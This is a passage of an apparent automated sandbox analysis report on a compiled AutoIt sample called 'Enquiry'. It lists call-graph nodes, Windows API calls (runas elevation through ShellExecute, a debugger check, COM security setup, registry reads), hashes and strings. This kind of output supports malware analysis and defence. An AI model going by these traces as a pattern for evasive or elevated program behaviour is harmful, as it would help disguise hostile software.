calls 86271 46f971 86268->86271 86272 45340c 85 API calls 86269->86272 86273 45340c 85 API calls 86270->86273 86292 46cb5f 86271->86292 86272->86276 86274 46f95f 86273->86274 86276->86268 86344 475077 86278->86344 86293 40bc70 52 API calls 86292->86293 86397 4533eb 86344->86397 86347 4750ee 86349 408f40 VariantClear 86347->86349 86348 475129 86401 4646e0 86348->86401 86357 4750f5 86349->86357 86398 453404 86397->86398 86399 4533f8 86397->86399 86398->86347 86398->86348 86399->86398 86444 4531b1 85 API calls 5 library calls 86399->86444 86445 4536f7 53 API calls 86401->86445 86444->86398 86450->85965 86452->85974 86453->85979 86454->86027 86455->86027 86456->85999 86457->86014 86458->86023 86459->85989 86460->85993 86461->85995 86462->86054 86463->86054 86464->86010 86465->86029 86466->86016 86467->86047 86468->86068 86469->86068 86477->86029 86478 428905 86479 4115d7 52 API calls 86478->86479 86480 42890c 86479->86480 86481 428945 86480->86481 86482 42891f 86480->86482 86483 4115d7 52 API calls 86481->86483 86484 4115d7 52 API calls 86482->86484 86485 42894c 86483->86485 86486 428925 _memmove 86484->86486 86487 42b14b 86494 40bc10 86487->86494 86489 42b159 86490 4096a0 337 API calls 86489->86490 86491 42b177 86490->86491 86505 44b92d VariantClear 86491->86505 86493 42bc5b 86495 40bc24 86494->86495 86496 40bc17 86494->86496 86498 40bc2a 86495->86498 86499 40bc3c 86495->86499 86497 408e80 VariantClear 86496->86497 86500 40bc1f 86497->86500 86501 408e80 VariantClear 86498->86501 86502 4115d7 52 API calls 86499->86502 86500->86489 86503 40bc33 86501->86503 86504 40bc43 86502->86504 86503->86489 86504->86489 86505->86493 86506 40ad09 86507 40bc10 53 API calls 86506->86507 86508 40ad1f 86507->86508 86509 40ad40 86508->86509 86513 40c1f0 86508->86513 86547 44b92d VariantClear 86509->86547 86512 42bc5b 86514 40c2c0 52 API calls 86513->86514 86515 40c21f 86514->86515 86516 42965b 86515->86516 86517 40c22a 86515->86517 86606 45e737 90 API calls 3 library calls 86516->86606 86527 40c232 86517->86527 86605 40c4e0 206 API calls 86517->86605 86519 40c23e 86520 40c256 86519->86520 86522 4296c7 86519->86522 86523 408e80 VariantClear 86520->86523 86608 45e737 90 API calls 3 library calls 86522->86608 86530 40c25f 86523->86530 86524 429673 86548 47e250 86524->86548 86527->86519 86527->86524 86528 42969a 86542 40c27c 86528->86542 86607 45e737 90 API calls 3 library calls 86528->86607 86531 429721 86530->86531 86530->86542 86609 457f66 87 API calls __write_nolock 86530->86609 86533 429753 86531->86533 86610 472f47 127 API calls 86531->86610 86535 408e80 VariantClear 86533->86535 86534 429708 86537 45340c 85 API calls 86534->86537 86538 42975f 86535->86538 86543 42970e _wcslen 86537->86543 86541 408f40 VariantClear 86538->86541 86539 429734 86540 45340c 85 API calls 86539->86540 86544 42973d _wcslen 86540->86544 86541->86542 86542->86509 86543->86531 86545 408e80 VariantClear 86543->86545 86544->86533 86546 408e80 VariantClear 86544->86546 86545->86531 86546->86533 86547->86512 86549 40bc70 52 API calls 86548->86549 86550 47e28d 86549->86550 86551 47e2ed 86550->86551 86553 47e2ae 86550->86553 86552 46fe32 VariantClear 86551->86552 86555 47e2f6 86552->86555 86554 408e80 VariantClear 86553->86554 86556 47e2ba 86554->86556 86557 47e305 86555->86557 86558 47e319 86555->86558 86562 408f40 VariantClear 86556->86562 86559 402160 52 API calls 86557->86559 86650 40e0a0 52 API calls 86558->86650 86561 47e315 86559->86561 86564 47e38e 86561->86564 86611 475a67 86561->86611 86563 47e2ca 86562->86563 86565 408f40 VariantClear 86563->86565 86639 47b291 86564->86639 86567 47e2d2 86565->86567 86570 410c60 VariantClear 86567->86570 86568 47e346 86568->86564 86571 47e34a 86568->86571 86573 47e2da 86570->86573 86651 45e538 90 API calls 3 library calls 86571->86651 86572 47e3b7 86575 47e3bb 86572->86575 86581 47e3ed 86572->86581 86576 408f40 VariantClear 86573->86576 86577 40e710 53 API calls 86575->86577 86578 47e2e2 86576->86578 86579 47e3c8 86577->86579 86578->86528 86582 40e710 53 API calls 86579->86582 86580 47e48e 86589 47e250 237 API calls 86580->86589 86581->86580 86585 408e80 VariantClear 86581->86585 86584 47e358 86582->86584 86583 408f40 VariantClear 86586 47e368 86583->86586 86584->86583 86588 47e481 86585->86588 86587 408f40 VariantClear 86586->86587 86590 47e370 86587->86590 86591 40e710 53 API calls 86588->86591 86592 47e4ae 86589->86592 86593 410c60 VariantClear 86590->86593 86591->86580 86596 408f40 VariantClear 86592->86596 86594 47e378 86593->86594 86595 408f40 VariantClear 86594->86595 86597 47e380 86595->86597 86598 47e4c0 86596->86598 86597->86528 86599 408f40 VariantClear 86598->86599 86600 47e4c8 86599->86600 86601 410c60 VariantClear 86600->86601 86602 47e4d0 86601->86602 86603 408f40 VariantClear 86602->86603 86604 47e4d8 86603->86604 86604->86528 86605->86527 86606->86524 86607->86542 86608->86542 86609->86534 86610->86539 86612 475ae5 86611->86612 86615 475ac5 86611->86615 86652 45e737 90 API calls 3 library calls 86612->86652 86614 475afe 86616 408f40 VariantClear 86614->86616 86615->86612 86617 475b42 86615->86617 86618 402780 52 API calls 86615->86618 86622 475b06 86616->86622 86619 402780 52 API calls 86617->86619 86618->86615 86620 475b60 86619->86620 86621 475c7c 86620->86621 86624 40c2c0 52 API calls 86620->86624 86625 40a780 206 API calls 86620->86625 86627 475cc7 86620->86627 86628 40ba10 52 API calls 86620->86628 86630 475cd5 86620->86630 86631 408f40 VariantClear 86620->86631 86636 475ca0 86620->86636 86653 40c4e0 206 API calls 86620->86653 86623 408f40 VariantClear 86621->86623 86622->86568 86626 475c84 86623->86626 86624->86620 86625->86620 86626->86568 86629 408f40 VariantClear 86627->86629 86628->86620 86632 475ca8 86629->86632 86654 45e737 90 API calls 3 library calls 86630->86654 86631->86620 86632->86568 86635 475ce8 86637 408f40 VariantClear 86635->86637 86638 408f40 VariantClear 86636->86638 86637->86632 86638->86632 86640 47b2e7 86639->86640 86641 47b2a5 86639->86641 86640->86572 86642 40e710 53 API calls 86641->86642 86643 47b2af 86642->86643 86644 47b2b7 86643->86644 86645 47b2cf 86643->86645 86655 47974b 86644->86655 86647 47974b 144 API calls 86645->86647 86649 47b2df 86647->86649 86648 47b2c7 86648->86572 86649->86572 86650->86561 86651->86584 86652->86614 86653->86620 86654->86635 86656 479786 86655->86656 86657 479aed 86655->86657 86656->86657 86660 479798 86656->86660 86724 451b42 61 API calls 86657->86724 86659 479b00 86659->86648 86661 4797a2 86660->86661 86662 4797be 86660->86662 86717 451b42 61 API calls 86661->86717 86663 4797c7 86662->86663 86664 4797e3 86662->86664 86718 451b42 61 API calls 86663->86718 86695 441eba 86664->86695 86668 4797b5 86668->86648 86669 4797da 86669->86648 86670 4797f7 86671 479815 86670->86671 86672 4797fe 86670->86672 86676 47983c 86671->86676 86700 451d2b 86671->86700 86719 451b42 61 API calls 86672->86719 86674 47980c 86674->86648 86680 4798e6 86676->86680 86711 479714 86676->86711 86677 47994b VariantInit 86682 479980 __recalloc 86677->86682 86680->86677 86681 479916 VariantClear 86680->86681 86681->86680 86683 479a2c 86682->86683 86684 479a44 86682->86684 86685 479a0b 86682->86685 86721 451b42 61 API calls 86683->86721 86722 468070 104 API calls moneypunct 86684->86722 86685->86683 86686 479a12 86685->86686 86720 451b42 61 API calls 86686->86720 86690 479a24 86691 479aca VariantClear 86690->86691 86692 479adb 86691->86692 86692->86648 86693 479a50 86693->86691 86723 468070 104 API calls moneypunct 86693->86723 86696 441f12 86695->86696 86697 441ecc _wcslen 86695->86697 86696->86670 86697->86696 86698 410160 52 API calls 86697->86698 86699 441ede 86698->86699 86699->86670 86702 451d5e 86700->86702 86701 451e93 SysFreeString 86704 451ea0 86701->86704 86702->86701 86703 451f21 86702->86703 86702->86704 86710 451d68 86702->86710 86703->86704 86705 451f6d lstrcmpiW 86703->86705 86706 451f7f SysFreeString 86703->86706 86707 451fab 86703->86707 86704->86710 86725 44a545 RaiseException 86704->86725 86705->86706 86709 451fc7 SysFreeString 86705->86709 86706->86703 86707->86676 86709->86704 86710->86676 86712 479728 86711->86712 86726 479500 VariantInit 86712->86726 86714 479730 86765 437063 VariantClear VariantCopy 86714->86765 86716 47973a VariantClear 86716->86676 86717->86668 86718->86669 86719->86674 86720->86690 86721->86690 86722->86693 86723->86693 86724->86659 86725->86704 86727 47952a 86726->86727 86744 47955c 86726->86744 86728 479597 86727->86728 86729 4795c6 86727->86729 86730 479602 86727->86730 86731 479531 86727->86731 86732 4795b0 86727->86732 86733 479669 86727->86733 86734 479698 86727->86734 86739 4796b4 86727->86739 86740 4795e3 86727->86740 86743 479571 86727->86743 86727->86744 86752 479628 86727->86752 86779 443006 57 API calls 86728->86779 86738 45340c 85 API calls 86729->86738 86741 47960d VariantCopy 86730->86741 86730->86744 86753 408f40 VariantClear 86731->86753 86780 44b3ac 57 API calls 86732->86780 86733->86734 86747 479676 86733->86747 86766 473b76 86734->86766 86735 408f40 VariantClear 86742 4796d9 86735->86742 86745 4795d7 SysAllocString 86738->86745 86783 44ce43 VariantClear SafeArrayCreateVector _memmove 86739->86783 86781 479362 109 API calls 86740->86781 86746 408f40 VariantClear 86741->86746 86742->86714 86754 408f40 VariantClear 86743->86754 86744->86735 86745->86744 86751 47961d 86746->86751 86756 408f40 VariantClear 86747->86756 86751->86714 86759 479500 105 API calls 86752->86759 86757 479551 86753->86757 86755 47958c 86754->86755 86755->86714 86758 47968d 86756->86758 86757->86714 86758->86714 86760 479644 86759->86760 86782 437063 VariantClear VariantCopy 86760->86782 86762 47964b VariantClear 86763 408f40 VariantClear 86762->86763 86764 47965e 86763->86764 86764->86714 86765->86716 86784 443106 86766->86784 86768 473b88 SafeArrayCreateVector 86769 473be0 86768->86769 86772 473b99 86768->86772 86770 408f40 VariantClear 86769->86770 86771 473be8 86770->86771 86771->86744 86785 4680ed 55 API calls 86772->86785 86774 473bb8 _memmove 86775 408f40 VariantClear 86774->86775 86776 473bcc 86775->86776 86777 408f40 VariantClear 86776->86777 86778 473bd4 86777->86778 86778->86744 86779->86744 86780->86744 86781->86744 86782->86762 86783->86744 86784->86768 86785->86774 86786 425b2b 86791 40f000 86786->86791 86790 425b3a 86792 4115d7 52 API calls 86791->86792 86793 40f007 86792->86793 86794 4276ea 86793->86794 86800 40f030 86793->86800 86799 41130a 51 API calls __cinit 86799->86790 86801 40f039 86800->86801 86802 40f01a 86800->86802 86830 41130a 51 API calls __cinit 86801->86830 86804 40e500 86802->86804 86805 40bc70 52 API calls 86804->86805 86806 40e515 GetVersionExW 86805->86806 86807 402160 52 API calls 86806->86807 86808 40e557 86807->86808 86831 40e660 86808->86831 86814 427674 86817 4276c6 GetSystemInfo 86814->86817 86816 40e5cd GetCurrentProcess 86852 40ef20 LoadLibraryA GetProcAddress 86816->86852 86819 4276d5 GetSystemInfo 86817->86819 86820 40e5e0 86820->86819 86845 40efd0 86820->86845 86823 40e629 86849 40ef90 86823->86849 86826 40e641 FreeLibrary 86827 40e644 86826->86827 86828 40e653 FreeLibrary 86827->86828 86829 40e656 86827->86829 86828->86829 86829->86799 86830->86802 86832 40e667 86831->86832 86833 42761d 86832->86833 86834 40c600 52 API calls 86832->86834 86835 40e55c 86834->86835 86836 40e680 86835->86836 86837 40e687 86836->86837 86838 427616 86837->86838 86839 40c600 52 API calls 86837->86839 86840 40e566 86839->86840 86840->86814 86841 40ef60 86840->86841 86842 40e5c8 86841->86842 86843 40ef66 LoadLibraryA 86841->86843 86842->86816 86842->86820 86843->86842 86844 40ef77 GetProcAddress 86843->86844 86844->86842 86846 40e620 86845->86846 86847 40efd6 LoadLibraryA 86845->86847 86846->86817 86846->86823 86847->86846 86848 40efe7 GetProcAddress 86847->86848 86848->86846 86853 40efb0 LoadLibraryA GetProcAddress 86849->86853 86851 40e632 GetNativeSystemInfo 86851->86826 86851->86827 86852->86820 86853->86851 86854 425b5e 86859 40c7f0 86854->86859 86858 425b6d 86894 40db10 52 API calls 86859->86894 86861 40c82a 86895 410ab0 6 API calls 86861->86895 86863 40c86d 86864 40bc70 52 API calls 86863->86864 86865 40c877 86864->86865 86866 40bc70 52 API calls 86865->86866 86867 40c881 86866->86867 86868 40bc70 52 API calls 86867->86868 86869 40c88b 86868->86869 86870 40bc70 52 API calls 86869->86870 86871 40c8d1 86870->86871 86872 40bc70 52 API calls 86871->86872 86873 40c991 86872->86873 86896 40d2c0 52 API calls 86873->86896 86875 40c99b 86897 40d0d0 53 API calls 86875->86897 86877 40c9c1 86878 40bc70 52 API calls 86877->86878 86879 40c9cb 86878->86879 86898 40e310 53 API calls 86879->86898 86881 40ca28 86882 408f40 VariantClear 86881->86882 86883 40ca30 86882->86883 86884 408f40 VariantClear 86883->86884 86885 40ca38 GetStdHandle 86884->86885 86886 429630 86885->86886 86887 40ca87 86885->86887 86886->86887 86888 429639 86886->86888 86893 41130a 51 API calls __cinit 86887->86893 86899 4432c0 57 API calls 86888->86899 86890 429641 86900 44b6ab CreateThread 86890->86900 86892 42964f CloseHandle 86892->86887 86893->86858 86894->86861 86895->86863 86896->86875 86897->86877 86898->86881 86899->86890 86900->86892 86901 44b5cb 58 API calls 86900->86901 86902 425b6f 86907 40dc90 86902->86907 86906 425b7e 86908 40bc70 52 API calls 86907->86908 86909 40dd03 86908->86909 86916 40f210 86909->86916 86911 426a97 86913 40dd96 86913->86911 86914 40ddb7 86913->86914 86919 40dc00 52 API calls 2 library calls 86913->86919 86915 41130a 51 API calls __cinit 86914->86915 86915->86906 86920 40f250 RegOpenKeyExW 86916->86920 86918 40f230 86918->86913 86919->86913 86921 425e17 86920->86921 86922 40f275 RegQueryValueExW 86920->86922 86921->86918 86923 40f2c3 RegCloseKey 86922->86923 86924 40f298 86922->86924 86923->86918 86925 40f2a9 RegCloseKey 86924->86925 86926 425e1d 86924->86926 86925->86918
                            APIs
                            • _wcslen.LIBCMT ref: 004096C1
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 0040970C
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                            • _memmove.LIBCMT ref: 00409D96
                            • _memmove.LIBCMT ref: 0040A6C4
                            • _memmove.LIBCMT ref: 004297E5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                            • String ID:
                            • API String ID: 2383988440-0
                            • Opcode ID: eda493e7f635b4d651ef0572aa73cbf796ade256709b72ea31569c7d9da174e7
                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                            • Opcode Fuzzy Hash: eda493e7f635b4d651ef0572aa73cbf796ade256709b72ea31569c7d9da174e7
                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                            • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                            Strings
                            • runas, xrefs: 0042E2AD, 0042E2DC
                            • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                            • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                            • API String ID: 2495805114-3383388033
                            • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                            • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1531 46cc96-46cca1 1528->1531 1540 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1540 1529->1531 1532 46cc62-46cc8b call 43119b 1529->1532 1533 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1533 1531->1533 1549 46cc8e-46cc90 1532->1549 1551 46cdf4 1540->1551 1552 46ccfd-46cd1f call 402160 call 431a2b 1540->1552 1549->1531 1553 46ceb7-46cef0 call 468070 call 402250 * 3 1549->1553 1557 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1551->1557 1568 46cd35-46cd41 call 465177 1552->1568 1569 46cd21-46cd33 1552->1569 1557->1531 1566 46ce50-46ce55 1557->1566 1566->1531 1567 46ce5b-46ce62 1566->1567 1571 46ce64-46ce8b CoSetProxyBlanket 1567->1571 1572 46ce8d-46ce9e 1567->1572 1579 46cd46-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1568->1579 1573 46cda5-46cdaa 1569->1573 1571->1572 1572->1549 1576 46cea4-46ceb2 1572->1576 1577 46cdac-46cdbb call 4111c1 1573->1577 1578 46cdbd-46cdc0 1573->1578 1576->1533 1582 46cdc3-46cdf2 1577->1582 1578->1582 1579->1573 1582->1557
                            APIs
                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                            • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                            • _wcslen.LIBCMT ref: 0046CDB0
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                            Strings
                            • NULL Pointer assignment, xrefs: 0046CEA6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                            • String ID: NULL Pointer assignment
                            • API String ID: 440038798-2785691316
                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2003 427693-427696 1997->2003 2004 427688-427691 1997->2004 2002 4276b4-4276be 1998->2002 2005 427625-427629 1999->2005 2006 40e59c-40e59f 1999->2006 2017 40e5ec-40e60c 2000->2017 2018 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2018 2019 4276c6-4276ca GetSystemInfo 2002->2019 2003->2002 2007 427698-4276a8 2003->2007 2004->2002 2009 427636-427640 2005->2009 2010 42762b-427631 2005->2010 2011 40e5a5-40e5ae 2006->2011 2012 427654-427657 2006->2012 2015 4276b0 2007->2015 2016 4276aa-4276ae 2007->2016 2009->2000 2010->2000 2013 40e5b4 2011->2013 2014 427645-42764f 2011->2014 2012->2000 2020 42765d-42766f 2012->2020 2013->2000 2014->2000 2015->2002 2016->2002 2022 40e612-40e623 call 40efd0 2017->2022 2023 4276d5-4276df GetSystemInfo 2017->2023 2018->2017 2029 40e5e8 2018->2029 2019->2023 2020->2000 2022->2019 2028 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2028 2032 40e641-40e642 FreeLibrary 2028->2032 2033 40e644-40e651 2028->2033 2029->2017 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                            • String ID: 0SH
                            • API String ID: 3363477735-851180471
                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                            APIs
                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
